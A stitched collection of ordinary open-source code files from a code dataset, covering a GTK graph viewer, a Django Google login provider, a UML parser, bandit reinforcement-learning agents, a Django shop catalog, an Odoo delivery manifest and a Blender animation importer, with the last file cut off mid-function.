self.side_vb = Gtk.VBox(False, 1)
self.side_hb = Gtk.HBox(False, 1)
#self.dot_widget = DotWidget()
self.dot_widget = mydot_widget.MyDotWidget(self.uicore, self.main)
self.create_tree()
self.create_preview()
self.pack_start(self.dot_widget, True, True, 0)
self.bar = graph_bar.GraphBar(self.dot_widget, self, self.uicore)
#self.pack_start(self.bar, False, False, 0)
self.side_hb.pack_start(self.bar, False, False, 1)
if self.uicore.backend == 'radare':
self.pack_start(self.side_vb, False, False, 1)
self.side_hb.pack_start(self.sw, True, True, 1)
self.side_vb.pack_start(self.side_hb, True, True, 1)
self.side_vb.pack_start(self.preview, False, False, 0)
def set_dot(self, dotcode):
dotcode = dotcode.replace('overlap="scale", bgcolor="#475672"', 'overlap="scale", bgcolor="invis"')
dotcode = dotcode.replace('color=azure3, fontcolor=white, fillcolor="#373D49"', 'color=blue, fontcolor="#666666", fillcolor=white')
dotcode = dotcode.replace('fillcolor="#5E82C6"', 'fillcolor="white", color=green')
dotcode = dotcode.replace('color=lightgray, style=filled,', 'color=blue')
dotcode = dotcode.replace('color="lightgray"', 'color="blue"')
dotcode = dotcode.replace('len=1.25, color=azure3', 'len=1.25, color=blue')
dotcode = dotcode.replace('color=lightgray', 'color=lightgray, bgcolor=white')
dotcode = dotcode.replace('color="green"', 'color="green", fontname="Courier", fontsize="8"')
self.dot_widget.set_dotcode(dotcode)
self.generate_thumbnail(dotcode)
if self.uicore.backend == 'radare':
self.nodes = {}
function = ''
for node in self.dot_widget.graph.nodes:
function = ''
if node.url:
function, node_name = node.url.split('/')
self.nodes[node_name] = [node.x, node.y]
if function:
self.update_tree(function)
self.dot_widget.on_zoom_100(None)
# Navigate to first node
if self.uicore.backend == 'radare':
if len(self.nodes) > 1:
node = self.nodes.keys()[0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
def generate_thumbnail(self, dotcode):
#size = self.tree.allocation.width
size = self.side_hb.get_allocated_width()
tmp_dot = tempfile.NamedTemporaryFile(delete = False)
tmp_dot.write(dotcode)
tmp_dot.close()
cmd = "dot -Tpng " + tmp_dot.name + " > " + tmp_dot.name + ".png"
os.system(cmd)
im = Image.open(tmp_dot.name + ".png")
im.convert('RGBA')
im.thumbnail([size,size], Image.ANTIALIAS)
#im.save(tmp_dot.name + ".png.thumbnail", "JPEG")
# Add white backgound as image is transparent
offset_tuple = (im.size[0], im.size[1])
final_thumb = Image.new(mode='RGBA',size=offset_tuple, color=(255,255,255,0))
final_thumb.paste(im)
final_thumb.save(tmp_dot.name + ".png.thumbnail", "PNG")
self.fill_preview(tmp_dot.name + ".png.thumbnail")
os.remove(tmp_dot.name)
os.remove(tmp_dot.name + ".png")
os.remove(tmp_dot.name + ".png.thumbnail")
def create_preview(self):
# Create Image window for graph preview
self.preview = Gtk.Image()
self.preview.show()
def fill_preview(self, path):
self.preview.set_from_file(path)
def create_tree(self):
# Scrolled Window
self.sw = Gtk.ScrolledWindow()
self.sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
self.sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.store = Gtk.ListStore(str, str)
self.tree = Gtk.TreeView(self.store)
self.sw.add(self.tree)
self.tree.set_rules_hint(True)
# Connect right click popup search menu
self.popup_handler = self.tree.connect('button-press-event', self.popup_menu)
# Create the column
bblocks = Gtk.TreeViewColumn()
bblocks.set_title("Basic Blocks")
cell = Gtk.CellRendererText()
bblocks.pack_start(cell, True)
bblocks.add_attribute(cell, "text", 0)
self.treestore = Gtk.TreeStore(str)
# Add column to tree
self.tree.append_column(bblocks)
self.tree.set_model(self.treestore)
self.tree.expand_all()
def update_tree(self, function):
# Clear contents
self.treestore.clear()
# Iterate bb and add to the tree
it = self.treestore.append(None, [function])
nodes = self.nodes.keys()
nodes.sort()
for element in nodes:
self.treestore.append(it, [element])
self.tree.set_model(self.treestore)
self.tree.expand_all()
def popup_menu(self, tree, event):
if event.button == 1:
coordinates = tree.get_path_at_pos(int(event.x), int(event.y))
# Get the information about the click.
# coordinates is None if the click is outside the rows but inside
# the widget.
if not coordinates:
return False
(path, column, x, y) = coordinates
if len(path) == 2 and self.nodes:
node = self.treestore[path][0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
| gpl-2.0 | 5,638,959,716,393,014,000 | 37.769663 | 139 | 0.605564 | false |
maurodoglio/taarweb | taarweb/users/provider.py | 1 | 1486 | from allauth.socialaccount.app_settings import QUERY_EMAIL
from allauth.socialaccount.providers.google.provider import (GoogleAccount,
GoogleProvider,
Scope)
class TaarGoogleAccount(GoogleAccount):
def get_profile_url(self):
"""
The profile URL field is called 'profile' for OpenIDConnect profiles,
see https://developers.google.com/+/web/api/rest/openidconnect/getOpenIdConnect
"""
return self.account.extra_data.get('profile')
class TaarGoogleProvider(GoogleProvider):
def extract_uid(self, data):
return str(data['sub'])
def get_default_scope(self):
"Override the default method to prepend 'openid' and add specific order"
scope = ['openid']
if QUERY_EMAIL:
scope.append(Scope.EMAIL)
scope.append(Scope.PROFILE)
return scope
def get_hosted_domain(self):
"If configured returns the Google Apps domain"
return self.get_settings().get('HOSTED_DOMAIN', None)
def get_auth_params(self, request, action):
"If configured, adds the hosted domain to the auth request"
params = super().get_auth_params(request, action)
hosted_domain = self.get_hosted_domain()
if hosted_domain is not None:
params['hd'] = hosted_domain
return params
provider_classes = [TaarGoogleProvider]
| mpl-2.0 | -2,247,812,986,946,630,000 | 34.380952 | 87 | 0.617766 | false |
dmanev/ArchExtractor | ArchExtractor/umlgen/Specific/STK/StkParser/StkJilFileCriteria/StkJilDataCriteria.py | 1 | 2829 |
import re
import PortInterface.ProvidedPort
import PortInterface.RequiredPort
import PortInterface.SenderReceiverInterface
import Datatype.ArrayDataType
import PortInterface.DataElement
import StkParser.StkPortCriteria
import Components.IComponent
import Parser.IPortCriteria
class StkJilDataCriteria(StkParser.StkPortCriteria.StkPortCriteria):
"""STK JIL file data access criteria"""
def execute(self, inpTextContent, inoutIComponent):
## Bouml preserved body begin 0003536F
if re.search(r'Data\s+(\w+)', inpTextContent):
nextItemIsDataConfig = 0
dataName = None
for item in re.split(r'(Data\s+\w+)', inpTextContent):
nameMatchObj = re.search(r'Data\s+(\w+)', item)
if nameMatchObj:
nextItemIsDataConfig = 1
dataName = nameMatchObj.group(1)
elif nextItemIsDataConfig:
nextItemIsDataConfig = 0
dataProps = self.extractLevelOneBlock(item)
if dataProps:
dataType, hasArray = re.findall(r'\s*Type\s*=\s*([US]\d+)(Array|)',
dataProps, re.I)[0]
dtf = self.getDataTypeFactory()
DT = dtf.getDataType(dataType)
DE = PortInterface.DataElement.DataElement()
DE.setName(dataName)
if hasArray:
arrayProps = self.extractLevelOneBlock(dataProps)
arraySize = re.findall(r'\s*Size\s*=\s*(\d+)',
arrayProps, re.I)[0]
arrayDT = dtf.getArrayDataType('Arr'+arraySize+dataType)
arrayDT.itsDataType = DT
arrayDT.setMaxNumberOfElements(arraySize)
DE.itsDataType = arrayDT
else:
DE.itsDataType = DT
pif = self.getPortInterfaceFactory()
sendRecvIf = pif.getSenderReceiverIf(dataName, [DE])
provPortSetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortSetter.setName("set"+dataName)
provPortGetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortGetter.setName("get"+dataName)
inoutIComponent.addPort(provPortSetter)
inoutIComponent.addPort(provPortGetter)
return inoutIComponent
## Bouml preserved body end 0003536F
def __init__(self):
super(StkJilDataCriteria, self).__init__()
pass
| gpl-3.0 | 6,982,030,154,229,971,000 | 47.775862 | 92 | 0.537292 | false |
andreweskeclarke/reinforcement_learning | src/agents.py | 1 | 5084 | import math
import random
class Agent:
def __init__(self, actions, options={}):
self.rgen = random.SystemRandom() # cryptographically secure, unlike random
self.actions = actions
self.last_action = None
def __choose_exploitative_action__(self):
raise Exception('Not implemented!')
def __choose_exploratory_action__(self):
raise Exception('Not implemented!')
def __should_exploit__(self):
raise Exception('Not implemented!')
def __update__(self, reward, state=None):
raise Exception('Not implemented!')
def choose(self):
if self.__should_exploit__():
self.last_action = self.__choose_exploitative_action__()
else:
self.last_action = self.__choose_exploratory_action__()
return self.last_action
def update(self, reward, state=None):
self.__update__(reward, state=None)
class EGreedyAgent(Agent):
def __init__(self, actions, options={}):
super(EGreedyAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
self.avg_rewards = [0 for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.epsilon = options['epsilon']
def __choose_exploitative_action__(self):
return self.avg_rewards.index(max(self.avg_rewards))
def __choose_exploratory_action__(self):
return self.rgen.choice(self.actions)
def __should_exploit__(self):
return self.rgen.random() < (1 - self.epsilon)
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
def softmax_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
softmax_denominator = sum([math.exp(p) for p in action_prefs])
for a in actions:
softmax_a = math.exp(action_prefs[a]) / softmax_denominator
cumulative_probability = cumulative_probability - softmax_a
if cumulative_probability <= choice:
return a
assert(False)
def discrete_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
for a in actions:
cumulative_probability = cumulative_probability - action_prefs[a]
if cumulative_probability <= choice:
return a
assert(False)
class EGreedySoftmaxAgent(EGreedyAgent):
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.avg_rewards)
class ReinforcementComparisonAgent(Agent):
def __init__(self, actions, options={}):
super(ReinforcementComparisonAgent, self).__init__(actions, options)
self.action_preferences = [0 for a in self.actions]
self.alpha = options['alpha']
self.beta = options['beta']
self.reference_reward = 0
self.last_action = None
def __choose_exploitative_action__(self):
raise 'Unreachable code was reached!'
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.action_preferences)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
old_pref = self.action_preferences[self.last_action]
self.action_preferences[self.last_action] = old_pref + self.beta * (reward - self.reference_reward)
self.reference_reward = self.reference_reward + self.alpha * (reward - self.reference_reward)
class PursuitAgent(Agent):
def __init__(self, actions, options={}):
super(PursuitAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
self.avg_rewards = [0 for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.action_probs = [1.0/len(self.actions) for a in self.actions]
self.beta = options['beta']
def __choose_exploitative_action__(self):
raise 'Unreachable code was reached!'
def __choose_exploratory_action__(self):
return discrete_choice(self.rgen, self.actions, self.action_probs)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
max_index = self.avg_rewards.index(max(self.avg_rewards))
for i in range(0, len(self.action_probs)):
prob = self.action_probs[i]
if i != max_index:
self.action_probs[i] = prob + (self.beta * (0 - prob))
else:
self.action_probs[i] = prob + (self.beta * (1 - prob))
| mit | -68,055,493,988,964,190 | 35.84058 | 107 | 0.635917 | false |
escsun/radio-shop | catalog/views.py | 1 | 1793 | from django.shortcuts import render, get_object_or_404
from .models import Category, Product, Value
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.exceptions import ObjectDoesNotExist
from cart.forms import CartAddProductForm
def catalog_index(request, id=None):
categories = Category.objects.filter(parent_id=id)
try:
category = Category.objects.get(id=id)
except ObjectDoesNotExist:
category = Category.objects.none()
if not categories:
products_list = Product.objects.filter(category_id=id, is_available=True)
paginator = Paginator(products_list, per_page=25)
page = request.GET.get('page')
cart_product_form = CartAddProductForm()
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(paginator.num_pages)
if not products:
messages.error(request, "В данной категории товаров нет")
return render(request, 'catalog_products.html', {
"products": products,
"category": category,
"cart_product_form": cart_product_form
})
response = render(request, 'catalog_base.html', {
"categories": categories,
"category": category
})
return response
def catalog_product_detail(request, id):
product = Product.objects.get(id=id)
category = Category.objects.get(id=product.category.id)
values = Value.objects.filter(product_id=id)
return render(request, 'catalog_product_detail.html', {
"product": product,
"values": values,
"category": category
}) | gpl-3.0 | 3,052,322,435,605,630,000 | 34.36 | 81 | 0.664969 | false |
factorlibre/carrier-delivery | delivery_carrier_mrw/__openerp__.py | 1 | 1595 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2015 FactorLibre (http://www.factorlibre.com)
# Hugo Santos <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MRW Deliveries WebService',
'version': '0.1',
'author': "FactorLibre",
'category': 'Sales Management',
'depends': [
'delivery',
'base_delivery_carrier_label'
],
'website': 'http://factorlibre.com',
'data': [
'security/ir.model.access.csv',
'view/mrw_config_view.xml',
'view/delivery_view.xml',
'view/stock_view.xml'
],
'demo': [],
'installable': True,
'auto_install': False,
'license': 'AGPL-3',
'external_dependencies': {
'python': ['suds'],
}
}
| agpl-3.0 | -2,021,363,104,424,025,300 | 35.25 | 78 | 0.576176 | false |
niacdoial/blemd | pseudobones.py | 1 | 21031 | from mathutils import Vector, Euler, Matrix
import bpy
import math
import re
from .common import dict_get_set
from . import common
from .Matrix44 import rotation_part
# import weakref
import logging
log = logging.getLogger('bpy.ops.import_mesh.bmd.pseudobones')
NtoB = Matrix([[1,0,0,0],
[0,0,-1,0],
[0,1,0,0],
[0,0,0,1]])
BtoN = Matrix([[1,0,0,0],
[0,0,1,0],
[0,-1,0,0],
[0,0,0,1]])
def product(lamb, vct):
ret = vct.copy()
ret.x *= lamb
ret.y *= lamb
ret.z *= lamb
return ret
def sum2(vct1, vct2):
ret = vct1.copy()
ret.x += vct2.x
ret.y += vct2.y
ret.z += vct2.z
return ret
def subtract2(vct1, vct2):
ret = vct1.copy()
ret.x -= vct2.x
ret.y -= vct2.y
ret.z -= vct2.z
return ret
def vect_normalize(vect):
length = math.sqrt(vect.x**2 + vect.y**2 + vect.z**2)
if length < .01:
log.error('Vector to be normalized is near zero. Returning (0,0,1) to avoid crashes')
return Vector((0,0,1))
tempv = vect
tempv.x /= length
tempv.y /= length
tempv.z /= length
return tempv
def cubic_interpolator(t1, y1, d1, t2, y2, d2, t):
if -0.001 < t2-t1 < 0.001:
log.warning('cannot interpolate between almost identiqual times')
return (y1+y2) / 2, 0
tn = (t-t1)/(t2-t1) # normalized time coordinate
d1 *= (t2-t1) # adapted derivatives for the normalized time interval
d2 *= (t2-t1)
# temporary values
# for the value
ya = (2*tn**3 - 3*tn**2 + 1)*y1
yb = (tn**3 - 2*tn**2 + tn)*d1
yc = (-2*tn**3 + 3*tn**2)*y2
yd = (tn**3 - tn**2)*d2
# and the tangent (will have to be corrected since d(a(b))=d(b)*d(a)(b))
da = (6*tn**2 - 6*tn) * y1
db = (3*tn**2 - 4*tn + 1) * d1
dc = (-6*tn**2 + 6*tn) * y2
dd = (3*tn**2 - 2*tn) * d2
y = ya+yb+yc+yd
d = (da+db+dc+dd)/(t2-t1)
return y, d, d
###
# the goal here is to get the matrix adapted to blender animation
# (from default pose to correct pose)
# in blender, the matrix chain looks like
# this (each contains translation and rotation):
# origin_s*origin_d*bone_1_s*bone_1_d*....*bone_n_s*bone_n_d
def get_dynamic_mtx(p_bone, frame):
if frame not in p_bone.computed_d_matrices.keys():
local_mtx_y, local_mtx_ydL, local_mtx_ydR = p_bone.frames.get_mtx(frame)
inv_static_mtx = p_bone.jnt_frame.getFrameMatrix().inverted()
p_bone.computed_d_matrices[frame] = (inv_static_mtx * local_mtx_y,
inv_static_mtx * local_mtx_ydL,
inv_static_mtx * local_mtx_ydR)
return p_bone.computed_d_matrices[frame]
def get_pos_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_translation()
ydL = ydL.to_translation()
ydR = ydR.to_translation()
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).position()
dL = (ydL-y)/EPSILON
dR = (ydR-y)/EPSILON
return y, dL, dR
def get_rot_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_euler('XYZ')
ydL = ydL.to_euler('XYZ')
ydR = ydR.to_euler('XYZ')
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).rotation()
dL = product(1/EPSILON, subtract2(ydL, y))
dR = product(1/EPSILON, subtract2(ydR, y))
return y, dL, dR
def get_sc_vct(p_bone, frame):
y, dL, dR = p_bone.frames.get_sc(frame)
y.x /= p_bone.jnt_frame.sx
y.y /= p_bone.jnt_frame.sy
y.z /= p_bone.jnt_frame.sz
dL.x /= p_bone.jnt_frame.sx
dL.y /= p_bone.jnt_frame.sy
dL.z /= p_bone.jnt_frame.sz
dR.x /= p_bone.jnt_frame.sx
dR.y /= p_bone.jnt_frame.sy
dR.z /= p_bone.jnt_frame.sz
return y, dL, dR
instances = {}
class KeyFrames:
def __init__(self):
self.times = {}
self.positions = [{}, {}, {}]
self.rotations = [{}, {}, {}]
self.scales = [{}, {}, {}]
def feed_anim(self, anim, include_sc=True, fr_sc=1, fr_of=0):
for key in anim.translationsX:
self.positions[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsY:
self.positions[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsZ:
self.positions[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.rotationsX:
self.rotations[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsY:
self.rotations[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsZ:
self.rotations[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
if include_sc:
for key in anim.scalesX:
self.scales[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesY:
self.scales[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesZ:
self.scales[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
# add last frame on everything (to avoid crashes), but not register them as 'real'
anim_length = max(self.times.keys())
for coordinate in (0,1,2):
max_time = max(self.positions[coordinate].keys())
if max_time < anim_length:
self.positions[coordinate][anim_length] = self.positions[coordinate][max_time]
max_time = max(self.rotations[coordinate].keys())
if max_time < anim_length:
self.rotations[coordinate][anim_length] = self.rotations[coordinate][max_time]
max_time = max(self.scales[coordinate].keys())
if max_time < anim_length:
self.scales[coordinate][anim_length] = self.scales[coordinate][max_time]
def _get_vt(self, data, time):
if time in data.keys():
return data[time]
elif len(data.keys()) == 1:
return next(iter(data.values()))
prev_t = -math.inf
next_t = +math.inf
for frame_t in data.keys():
if prev_t < frame_t < time:
prev_t = frame_t
elif time < frame_t < next_t:
next_t = frame_t
return cubic_interpolator(prev_t, data[prev_t][0], data[prev_t][2],
next_t, data[next_t][0], data[next_t][1], time)
def get_pos(self, time):
temp_x = self._get_vt(self.positions[0], time)
temp_y = self._get_vt(self.positions[1], time)
temp_z = self._get_vt(self.positions[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_rot(self, time):
temp_x = self._get_vt(self.rotations[0], time)
temp_y = self._get_vt(self.rotations[1], time)
temp_z = self._get_vt(self.rotations[2], time)
return (Euler((temp_x[0], temp_y[0], temp_z[0]), 'XYZ'),
Euler((temp_x[1], temp_y[1], temp_z[1]), 'XYZ'),
Euler((temp_x[2], temp_y[2], temp_z[2]), 'XYZ'))
def get_sc(self, time):
temp_x = self._get_vt(self.scales[0], time)
temp_y = self._get_vt(self.scales[1], time)
temp_z = self._get_vt(self.scales[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_mtx(self, time):
EPSILON = 1E-4
vct_y, vct_dL, vct_dR = self.get_pos(time)
rot_y, rot_dL, rot_dR = self.get_rot(time)
vct_ydL = sum2(vct_y, product(EPSILON, vct_dL))
rot_ydL = sum2(rot_y, product(EPSILON, rot_dL))
vct_ydR = sum2(vct_y, product(EPSILON, vct_dR))
rot_ydR = sum2(rot_y, product(EPSILON, rot_dR))
return ( (Matrix.Translation(vct_y) * rot_y.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydL) * rot_ydL.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydR) * rot_ydR.to_matrix().to_4x4()) )
class Pseudobone:
def __init__(self, parentBone, frame, matrix, startpoint, endpoint):
self._name = None
ori = endpoint - startpoint
self.endpoint = endpoint
self.length = math.sqrt(ori.x**2 + ori.y**2 + ori.z**2)
self.orientation = vect_normalize(ori)
self.scale = Vector((1, 1, 1))
self.jnt_frame = None
# self.rotation_euler = Euler((0, 0, 0), 'XYZ')
self.position = startpoint
self.frames = KeyFrames()
# self.inverted_static_mtx = None
self.computed_d_matrices = {}
self.computed_t_matrices = {}
# self.scale_kf = {} # keyframes (values)
# self.scale_tkf = {} # keyframes (tangents)
# self.rotation_kf = {}
# self.rotation_tkf = {}
# self.position_kf = {}
# self.position_tkf = {}
# self.transform = mathutils.Matrix.Identity(4) # what to do with that? it will be ultimately useless.
self._parent = None
self.children = []
# property business --------------------------------
def _getname():
return self._name
def _setname(val):
global instances
if self._name is not None:
del instances[self._name]
if val is None and val in instances.keys():
raise ValueError('name taken')
self._name = val
instances[val] = self
def _delname():
self.name = None
self.name = property(_getname, _setname, _delname)
def _getparent():
return self._parent
def _setparent(val):
if isinstance(self.parent.fget(), Pseudobone) and (self in self.parent.fget().children):
self.parent.fget().children.remove(self)
self._parent = val
if val is None or isinstance(val, Vector):
return
val.children.append(self)
self.parent = property(_getparent, _setparent)
def _setinchildren(holder, val):
list.append(holder.children, val)
val._parent = holder
# self.children_append = (lambda self2, x: _setinchildren(self, x))
if isinstance(frame, str):
self.name.fset(frame)
else:
self.jnt_frame = frame
self.name.fset(frame.name)
self.parent.fset(parentBone)
self.matrix = matrix
# defines self.name, self.parent, self.children_append.
def pre_delete(self):
# call before losing variable to avoid memory leak
self.parent.fset(None)
for com in self.children:
com.pre_delete()
def _tree_to_array(self, dest):
"""inner function. do not call."""
dest.append(self)
for com in self.children:
com._tree_to_array(dest)
def tree_to_array(self):
"""returns a list of all bones"""
ret = []
self._tree_to_array(ret)
return ret
def reset(self):
self.frames = KeyFrames()
self.computed_d_matrices = {}
self.computed_t_matrices = {}
def get_z(self):
if common.GLOBALS.no_rot_conversion:
return rotation_part(self.matrix) * Vector((0,0,1))
else:
return NtoB*rotation_part(self.matrix)*BtoN * Vector((0,0,1))
def getBoneByName(name):
global instances
try:
return instances[name]
except KeyError:
return None
def getvct(one, distance, tgt):
"""get the right keyframe handle vector""" # XCX use me!
# method one:
return Vector((one, one*tgt))
finder = re.compile(r'''pose\.bones\[['"](\w*)['"]\]\.(\w*)''')
#used to determine what curves belong to what bones
def apply_animation(bones, arm_obj, jntframes, name=None):
"""apply keyframes from pseudobones to real, armature bones"""
if name:
arm_obj.animation_data.action = bpy.data.actions.new(name + '_action')
else:
arm_obj.animation_data.action = bpy.data.actions.new(arm_obj.name+'_action')
bpy.context.scene.frame_current = 0
# warning: here, the `name` var changes meaning
for com in bones:
name = com.name.fget()
arm_obj.data.bones[name].use_inherit_scale = False # scale can be applied
posebone = arm_obj.pose.bones[name]
if common.GLOBALS.no_rot_conversion:
posebone.rotation_mode = "XYZ"
else:
posebone.rotation_mode = "XZY" # remember, coords are flipped
bpy.context.scene.frame_current = 0
# this keyframe is needed, overwritten anyways
# also it is always at 1 because this function is called once per action
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
fcurves = arm_obj.animation_data.action.fcurves
data = {}
for curve in fcurves:
# create data in dicts ({bonename:{datatype:[0,1,2]...}...})
try:
bonename, datatype = finder.match(curve.data_path).groups()
except TypeError: # cannit unpack None: this fsurve is not interesting
continue
bonedict = common.dict_get_set(data, bonename, {})
datadict = common.dict_get_set(bonedict, datatype, [None, None, None])
datadict[curve.array_index] = curve
# create keyframes, with tengents
for com in bones:
name = com.name.fget()
bonedict = data[name]
posebone = arm_obj.pose.bones[name]
bpy.context.scene.frame_current = 0
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
every_frame = list(com.frames.times.keys())
every_frame.sort()
refpos = com.jnt_frame
if type(com.parent.fget()) is not Pseudobone:
com.rotmatrix = Matrix.Identity(4)
com.parentrot = Matrix.Identity(4)
else:
com.rotmatrix = com.parent.fget().rotmatrix
com.parentrot = com.parent.fget().rotmatrix
tempmat = Euler((refpos.rx, refpos.ry, refpos.rz), 'XYZ').to_matrix().to_4x4()
com.rotmatrix *= tempmat
cancel_ref_rot = tempmat.inverted()
for frame in every_frame:
bpy.context.scene.frame_current = frame
# flip y and z when asked for
if com.frames.times[frame][0]:
vct, tgL, tgR = get_pos_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.location[0] = vct.x
co = bonedict['location'][0].keyframe_points[-1].co
bonedict['location'][0].keyframe_points[-1].handle_left = co+Vector((-1, -tgL.x))
bonedict['location'][0].keyframe_points[-1].handle_right = co+Vector((1, tgR.x))
posebone.keyframe_insert('location', 0)
# fixed: add frame to keyframes AFTER setting the right value to it. so conter-intuitive.
if not math.isnan(vct.y):
posebone.location[1] = vct.y
co = bonedict['location'][1].keyframe_points[-1].co
bonedict['location'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['location'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('location', 1)
if not math.isnan(vct.z):
posebone.location[2] = vct.z
co = bonedict['location'][2].keyframe_points[-1].co
bonedict['location'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['location'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('location', 2)
if com.frames.times[frame][1]:
vct, tgL, tgR = get_rot_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.rotation_euler[0] = vct.x
co = bonedict['rotation_euler'][0].keyframe_points[-1].co
bonedict['rotation_euler'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['rotation_euler'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('rotation_euler', 0)
if not math.isnan(vct.y):
posebone.rotation_euler[1] = vct.y
co = bonedict['rotation_euler'][1].keyframe_points[-1].co
bonedict['rotation_euler'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['rotation_euler'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('rotation_euler', 1)
if not math.isnan(vct.z):
posebone.rotation_euler[2] = vct.z
co = bonedict['rotation_euler'][2].keyframe_points[-1].co
bonedict['rotation_euler'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['rotation_euler'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('rotation_euler', 2)
if com.frames.times[frame][2]:
vct, tgL, tgR = get_sc_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, tgL.z
tgR.z, tgR.y = tgR.y, tgR.z
vct.z, vct.y = vct.y, vct.z
if not math.isnan(vct.x):
posebone.scale[0] = vct.x
co = bonedict['scale'][0].keyframe_points[-1].co
bonedict['scale'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['scale'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('scale', 0)
if not math.isnan(vct.y):
posebone.scale[1] = vct.y
co = bonedict['scale'][1].keyframe_points[-1].co
